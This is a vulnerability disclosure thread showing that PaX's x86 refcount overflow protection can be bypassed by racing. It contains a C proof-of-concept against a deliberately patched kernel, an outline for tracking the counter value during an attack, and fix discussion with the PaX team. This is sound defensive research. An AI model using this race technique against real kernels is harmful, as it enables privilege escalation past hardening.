
Issue 856


Issue metadata

Status: Fixed
Closed: Nov 2016

PaX: reference count overflow mitigation can be bypassed on x86 by racing

Reported by jannh@google.com (Project Member), Jun 27 2016

Issue description

PaX contains a mitigation for reference count overflows that is intended to prevent atomic_t variables from reaching 0x80000000 and, more importantly, wrapping around to zero. A documented special case on x86 (https://forums.grsecurity.net/viewtopic.php?f=7&t=4173#APPENDA) is that, because "atomically increment unless current value is X" can't be implemented without a cmpxchg loop, the code instead increments the counter, checks for an overflow and, if an overflow happened, immediately decrements the counter back.
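
For illustration, the pattern looks roughly like this (a simplified sketch of the documented behavior, not the literal PaX source):

======
/* Simplified sketch of the x86 pattern described above; not the literal
 * PaX source. The window between "lock incl" and the undoing "lock decl"
 * is the race this report is about. */
typedef struct { volatile int counter; } atomic_t;

static inline void atomic_inc_checked(atomic_t *v)
{
  asm volatile("lock incl %0\n\t"
               "jno 1f\n\t"        /* no signed overflow: done */
               "lock decl %0\n\t"  /* overflow: undo the increment... */
               /* ...and invoke the refcount overflow handler (elided) */
               "1:"
               : "+m" (v->counter));
}
======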

The design assumes that this race is too narrow to hit in practice; in my tests, however, the race is usually won in a few seconds at most.

My test setup:

In a VirtualBox VM, I installed Linux 4.5.7 with a config based on Debian's distro config, patched with grsecurity-3.1-4.5.7-201606262019.patch, with grsecurity configured as follows:

  Configuration Method (Automatic)
  Usage Type (Desktop)
  Virtualization Type (Guest)
  Virtualization Hardware (EPT/RVI Processor Support)
  Virtualization Software (VirtualBox)
  Required Priorities (Security)

I applied a kernel patch (attached as overflowme.patch) to introduce an atomic_t that starts at 0x7fffffff and can be incremented by the user.

After booting the resulting kernel, I compiled (gcc -o test_refcount test_refcount.c -std=gnu99 -Wall) and ran the following test program:

======
#include <stdint.h>
#include <sys/eventfd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <err.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

#define CONCURRENCY 10

int efd;

void make_child(void) {
  pid_t child = fork();
  if (child == -1)
    err(1, "fork");
  if (child != 0)
    return;

  uint64_t ctr = 4242;  /* written value is arbitrary; each write bumps the counter */
  for (int i=0; i<1000; i++)
    write(efd, &ctr, 8);
  exit(0);
}

unsigned int get_value(void) {
  uint64_t value;
  /* read back the 64-bit counter value from the patched eventfd */
  if (read(efd, &value, sizeof(value)) != 8)
    err(1, "efd read");
  return value;
}

int main(void) {
  setbuf(stdout, NULL);

  efd = eventfd(0, 0);
  if (efd == -1)
    err(1, "eventfd");
  printf("counter: 0x%x\n", get_value());

  for (int i=0; i<CONCURRENCY; i++)
    make_child();

  while (1) {
    int status;
    if (wait(&status) == -1)
      err(1, "wait");
    unsigned int value = get_value();
    if (value == 0x7fffffff) {
      putchar('.');  /* mitigation held: counter is back at the threshold */
    } else if (value == 0xffffffff) {
      putchar('#');  /* counter has climbed all the way up to 0xffffffff */
    } else {
      printf("\nnew status: 0x%x\n", value);
      if (value > 30 && value < 0x10000000)
        return 0;    /* counter wrapped around to a small value: done */
    }
    make_child();
  }
}
======

The program output looks like this (dots stand for failed race attempts):

======
counter: 0x7fffffff
....................................................
new status: 0x80000017

new status: 0x8000006f

new status: 0x8000157d

new status: 0x800015c6
[...]
======

Before the race is won, PaX will repeatedly complain about the overflowing reference counters and terminate the offending processes:

======
Message from syslogd@debian at Jun 27 16:34:29 ...
 kernel:[ 5699.705439] PAX: refcount overflow detected in: test_refcount:26921, uid/euid: 1000/1000

Message from syslogd@debian at Jun 27 16:34:29 ...
 kernel:[ 5699.705563] PAX: refcount overflow detected in: test_refcount:26925, uid/euid: 1000/1000

Message from syslogd@debian at Jun 27 16:34:29 ...
 kernel:[ 5699.706708] PAX: refcount overflow detected in: test_refcount:26919, uid/euid: 1000/1000
[...]
======

The program then continues to increment the reference counter for a while before it reaches 0xffffffff, at which point the second overflow back to small numbers requires the same race to be won again.


Some notes:
 - I haven't tested this outside VirtualBox - being in a VM might increase
   the probability of hitting the race.
 - The VM was configured to have 6 processor cores. Because any two of the
   six tasks can race with each other, I think the birthday paradox applies
   and significantly raises the probability of success.
 - The kernel was not configured with CONFIG_PREEMPT (only
   CONFIG_PREEMPT_VOLUNTARY), so only six tasks raced with each other at a
   time; on a system with CONFIG_PREEMPT, forcibly preempted tasks might,
   depending on where the race occurs, also be able to participate in races.


For reference counters, a nice way to fix this would be to just replace the "jno" instructions in the x86-specific assembly code with "jns". This would preserve the property that atomic_t can overstep the 0x7fffffff threshold for a short moment, but would get rid of the race permitting permanent increments beyond that threshold. This fix would have the advantage that the code size doesn't change.
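
A sketch of this change, using the same simplified pattern as above (again, not the literal PaX source):

======
/* With "jns", any increment that leaves the counter negative is undone,
 * even one performed after another task has already pushed the counter
 * past 0x7fffffff, so increments beyond the threshold cannot persist. */
static inline void atomic_inc_checked_jns(atomic_t *v)
{
  asm volatile("lock incl %0\n\t"
               "jns 1f\n\t"        /* result still non-negative: done */
               "lock decl %0\n\t"  /* result negative: undo and report */
               "1:"
               : "+m" (v->counter));
}
======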

Sadly, since some users of atomic_t (such as i_writecount) aren't actually reference counters and can legitimately have negative values, this doesn't work directly; it would require changing those users of atomic_t to atomic_unchecked_t or similar.

If removing the refcounting protection from fields that can take negative values is undesirable, it might be necessary to increase the code size and e.g. perform an addition with an immediate value prior to checking the overflow flag.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 
Comment 1 by jannh@google.com (Project Member), Jun 27 2016

Attachment: overflowme.patch (1.7 KB)

Comment 2 by hawkes@google.com (Project Member), Jul 8 2016

Cc: pagee...@freemail.hu jann@thejh.net spen...@grsecurity.net
Labels: -Restrict-View-Commit
Lifting view restriction. The following update was provided by PaX team:

----

in general, we believe that there's no need to keep any of this secret, so feel 
free to open it up to the public. in fact we believe that this is a publicly known
and documented issue (in more than one way, as you'll see below), so we're not sure
what the point of all this was, but whatever.

regarding your particular claims:

1. we find the claim that "the race is usually won in a few seconds at most"
   misleading since your test already sets up the refcount precisely to INT_MAX
   which otherwise takes time and is part of the attack time. you also created
   a refcount read-back feature that we believe is not typically available to an
   attacker unless he's able to control the precise count (depends on the bug
   and circumstances).

2. in my experiments (quad core SNB at around 2.5GHz, both real and vmware)
   i could reproduce the (artificially shortened) race itself fine in a few
   seconds (depends somewhat on the number of cores, where one trades off control
   over the precise value of the refcount for speed). in my experience 2 cores
   don't do much worse than 4 cores.

   the next step in the attack is to reach a precise refcount value of 0, which
   here takes about 2.5-3 mins (real) and 5-7 mins (vmware). note that there's
   a constant work factor involved here: the syscall path you chose is relatively
   fast. back in 2008, when the motivating example for REFCOUNT appeared, the
   refcount overflow took more than 20 minutes to trigger in vmware.

   i also experimented with disabling IRQs around the refcount increment but it
   seemed to play little if any role so the race doesn't seem to be won because
   some interrupt arbitrarily extended the inc/dec window (this also means that
   preemption would have no useful effect for an attack).

   we're not sure why you described this part as needing to win the race again, as
   there're no checks and thus no saturation attempts at this point. perhaps you
   meant that an attack does have to care about precision, as reaching any value
   other than 0 will mean the whole attack attempt will have to be redone (so we
   are talking about several minutes per attack attempt). now i didn't think too
   much about how to precisely control the overflowed refcount value, so it's not
   clear whether this second step can be controlled with 100% certainty or not.

3. as for solving the problem, we have a few comments:
   - as the blog already notes, preventing operations on negative refcount (well,
     atomic_t) values doesn't work in general since some real use cases expect
     to work in that range already. a better solution is to saturate at a value
     that is at least NR_CPUS below the overflow threshold, this way the refcount
     cannot overflow into the negative range even if all cores win (in practice
     we'd need a bigger safety margin, as much as the number of increments we
     can expect while the interrupted saturation code sits in an irq/scheduling
     window). the problem with this approach is again that not all atomic users
     use single increments on the value, so this would require analysis and special
     cases, something we try to avoid.

     as for your suggestion about adding an immediate before checking for overflow,
     i don't see how it'd work, do you have a code example perhaps? e.g., to what
     value would you add the constant? the value before or after the atomic op?
     and how would you acquire either while avoiding the very race you're trying
     to defend against?

   - as we discussed in private already, we had practical reasons to not enable
     the reaction mechanism in grsec (PaX doesn't have much beyond reporting, by
     design). one is the existence of non-refcount atomic*_t false positives that,
     thanks to some work based on static analysis in recent months, we are just
     about to eradicate with reasonable confidence. Brad has in fact jumped the
     gun already and enabled the reaction mechanism, i'm still holding out as the
     static analysis isn't complete enough to my satisfaction.

     another reason for not enabling the attack reaction mechanism was that for
     refcount overflows attribution may not be easy if the refcount in question
     can also be used by innocent parties (e.g., task or mm struct). in such cases
     an attacker could DoS other users though he'd still lose the bug thanks to
     the logging (which we already consider a strong deterrent since any refcount
     overflow attack will generate logs).

not sure what the conclusion here is, but here's some parting thoughts anyway:
- you can publish this without delay, preferably with our comments (or at least
  let us comment on it once published),
- we consider the issue as publicly known and we'd been actively working on it
  before your report already,
- we question how close your PoC is to real life bugs and exploits.

----

Comment 3 by jann@thejh.net, Jul 8 2016

> regarding your particular claims:
>      
> 1. we find the claim that "the race is usually won in a few seconds at most"
>    misleading since your test already sets up the refcount precisely to INT_MAX
>    which otherwise takes time and is part of the attack time.

Perhaps I wasn't clear enough about what I intended to refer to with "the race".
"The race" was meant to refer to attacking the race condition in the refcounting
mitigation, not the full attack against a reference counting vulnerability.
In other words, I was talking about the added attack time compared to exploiting
such an issue on a kernel without this mitigation.


> you also created
>    a refcount read-back feature that we believe is not typically available to an
>    attacker unless he's able to control the precise count (depends on the bug
>    and circumstances).

The read-back feature was mostly meant to make it easier to see what's going on
and verify that the counter really is overflowing.

However, for a reference counter with a value that is unknown to the attacker but
isn't changed by things outside the attacker's control during the attack, I
believe that it is actually possible to determine the value of the counter in the
middle of the attack and then keep track of it.

When an attacker increments a reference counter and the calling process is killed
by the kernel, this discloses that the current reference counter value is
0x7fffffff. When the attacker then attacks the reference counter overflow, the
reference counter is incremented by the number of processes that are not killed.

This means that an attacker should be able to increment without parallel
execution until the refcounting mitigation triggers (0x7fffffff has been
reached) and then attack the race condition until the mitigation stops
triggering (>=0x80000000 has been reached).
At this point, the new reference count is known to be 0x7fffffff+N, where N is
the number of processes that didn't die after triggering the race condition.
Now the attacker can perform increments again, keeping track of the counter value.
As long as nothing else on the system changes the reference count shortly after
the second race, this should allow an attacker to exploit reference count
overflows as if a counter read primitive was available.
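
A rough outline of that approach (trigger_increment() is a hypothetical placeholder for whatever kernel path increments the target refcount once; it is not a real API):

======
#include <stdbool.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define CONCURRENCY 10

extern void trigger_increment(void);  /* hypothetical attacker primitive */

/* One single-threaded increment; returns false if the child was killed,
 * i.e. the mitigation fired because the counter was at 0x7fffffff. */
static bool increment_survived(void) {
  pid_t child = fork();
  if (child == 0) {
    trigger_increment();
    _exit(0);
  }
  int status;
  waitpid(child, &status, 0);
  return WIFEXITED(status);
}

/* One race attempt; each surviving child moved the counter up by one. */
static uint32_t race_once(void) {
  pid_t children[CONCURRENCY];
  for (int i = 0; i < CONCURRENCY; i++) {
    children[i] = fork();
    if (children[i] == 0) {
      trigger_increment();
      _exit(0);
    }
  }
  uint32_t survivors = 0;
  for (int i = 0; i < CONCURRENCY; i++) {
    int status;
    waitpid(children[i], &status, 0);
    if (WIFEXITED(status))
      survivors++;
  }
  return survivors;
}

static uint32_t find_counter_value(void) {
  /* Phase 1: increment until the mitigation fires; the counter is then
   * known to be exactly 0x7fffffff. */
  while (increment_survived())
    ;
  /* Phase 2: attack the race until at least one increment sticks. */
  uint32_t value = 0x7fffffff;
  while (value == 0x7fffffff)
    value += race_once();
  return value;  /* from here on, increments can be tracked exactly */
}
======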

> 2. in my experiments (quad core SNB at around 2.5GHz, both real and vmware)
>    i could reproduce the (artificially shortened) race itself fine in a few
>    seconds (depends somewhat on the number of cores, where one trades off control
>    over the precise value of the refcount for speed). in my experience 2 cores
>    don't do much worse than 4 cores.

Ah, I wouldn't have expected that.


>    we're not sure why you described this part as needing to win the race again, as
>    there're no checks and thus no saturation attempts at this point. perhaps you
>    meant that an attack does have to care about precision, as reaching any value
>    other than 0 will mean the whole attack attempt will have to be redone (so we
>    are talking about several minutes per attack attempt). now i didn't think too
>    much about how to precisely control the overflowed refcount value, so it's not
>    clear whether this second step can be controlled with 100% certainty or not.

Sorry, please ignore that part. I was confused about the circumstances under which
the overflow flag is set.


> 3. as for solving the problem, we have a few comments:
>    - as the blog already notes, preventing operations on negative refcount (well,
>      atomic_t) values doesn't work in general since some real use cases expect
>      to work in that range already. a better solution is to saturate at a value
>      that is at least NR_CPUS below the overflow threshold, this way the refcount
>      cannot overflow into the negative range even if all cores win (in practice
>      we'd need a bigger safety margin, as much as the number of increments we
>      can expect while the interrupted saturation code sits in an irq/scheduling
>      window). the problem with this approach is again that not all atomic users
>      use single increments on the value, so this would require analysis and special
>      cases, something we try to avoid.

Ah, true. It looks like there are a lot of atomic_t variables, used for memory
usage tracking and similar purposes, that can be incremented in relatively
big steps.

However: ignoring them in the mitigation design wouldn't introduce bugs; it would
just mean that the mitigation might be bypassable for these atomic counters, right?
So changing the current mitigation to check against a safety margin instead would
make the protection reliable for normal reference counting, in exchange for
potentially making it bypassable for some cases that mostly aren't refcounting.
(Or you could do both checks - but of course that would increase the code size by
2 bytes or so for every atomic operation.)
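
Concretely, the margin check could look something like this userspace model with C11 atomics (a sketch only; the margin value is illustrative and kernel code would use atomic_t):

======
#include <stdatomic.h>

/* The saturation point sits a safety margin below the signed-overflow
 * threshold; the margin must exceed the number of increments that can
 * happen concurrently (NR_CPUS plus slack for tasks interrupted inside
 * this function). 4096 is just an illustrative value. */
#define SATURATE_AT (0x7fffffff - 4096)

static void refcount_inc_saturating(atomic_int *r) {
  int new_val = atomic_fetch_add_explicit(r, 1, memory_order_relaxed) + 1;
  if (new_val >= SATURATE_AT) {
    /* Pin the counter at the saturation point: the object leaks instead
     * of ever being freed early, and even if every core passes the check
     * at once, the counter stays far below 0x7fffffff. */
    atomic_store_explicit(r, SATURATE_AT, memory_order_relaxed);
    /* report / kill the offending task here */
  }
}
======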


>      as for your suggestion about adding an immediate before checking for overflow,
>      i don't see how it'd work, do you have a code example perhaps? e.g., to what
>      value would you add the constant? the value before or after the atomic op?
>      and how would you acquire either while avoiding the very race you're trying
>      to defend against?

It was a stupid idea. I was thinking of something like:

    lock addl $<increment>, <counter>   # atomic add (AT&T syntax)
    movl <counter>, %eax                # read the new value back (racy)
    addl $<safety margin>, %eax         # add the margin before checking OF

followed by the existing code that checks for the overflow flag. But of course
that doesn't actually make much sense given that x86 can directly compare a memory
argument to an immediate.

Comment 4 by hawkes@google.com (Project Member), Jul 11 2016

Summary: PaX: reference count overflow mitigation can be bypassed on x86 by racing (was: PaX: reference count overflow mitigation can be bypassed by racing)
Labels: -Severity-HIgh Severity-High

Comment 6 by jannh@google.com (Project Member), Nov 10 2016

Status: Fixed (was: New)
Marking as fixed since grsecurity triggers account lockout when the attacker loses the race, so it should be very hard to get past the mitigation now. (This change was made shortly after the bug was reported.)

Comment 7 by pagee...@gmail.com, Nov 10 2016

actually, we do even better now: https://forums.grsecurity.net/viewtopic.php?f=7&t=4173#p16722
